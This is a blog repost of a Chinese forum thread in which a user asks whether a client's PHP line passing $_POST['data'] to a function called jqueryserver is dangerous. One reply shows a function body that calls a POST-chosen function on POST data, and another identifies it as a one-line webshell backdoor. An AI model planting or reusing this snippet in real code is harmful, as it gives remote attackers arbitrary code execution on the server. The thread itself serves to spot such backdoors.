跳至主要內容
  • Hostloc 空間訪問刷分
  • 售賣場
  • 廣告位
  • 賣站?

4563博客

全新的繁體中文 WordPress 網站
  • 首頁
  • jqueryserver($_post[‘data’]); 有风险吗?
未分類
31 12 月 2020

jqueryserver($_post[‘data’]); 有风险吗?

jqueryserver($_post[‘data’]); 有风险吗?

資深大佬 : hopboy 7

接了一个客户的项目放我们的服务器, 客户代码里面这个部分有风险吗?

jqueryserver($_post[‘data’]);

大佬有話說 (4)

  • 資深大佬 : Xusually

    具体还是得看 jqueryserver()是干嘛的吧,如果收到提交过来的数据直接执行类似于 eval 之类的,那就是个一句话后门。
    但是你都让对方把代码部署在你们服务器上了,我感觉防不慎防啊

  • 資深大佬 : imdong

    然后发现代码如下。

    function jqeryserver($data)
    {
    $_POST[“action”]($data);
    }

  • 資深大佬 : ihipop

    @imdong 这是一句话木马

  • 資深大佬 : msg7086

    本身没太大风险,但是如果遇上不知道怎么配置服务器的运维,那就是很大的风险了……

文章導覽

上一篇文章
下一篇文章

AD

其他操作

  • 登入
  • 訂閱網站內容的資訊提供
  • 訂閱留言的資訊提供
  • WordPress.org 台灣繁體中文

51la

4563博客

全新的繁體中文 WordPress 網站
返回頂端
本站採用 WordPress 建置 | 佈景主題採用 GretaThemes 所設計的 Memory
4563博客
  • Hostloc 空間訪問刷分
  • 售賣場
  • 廣告位
  • 賣站?
在這裡新增小工具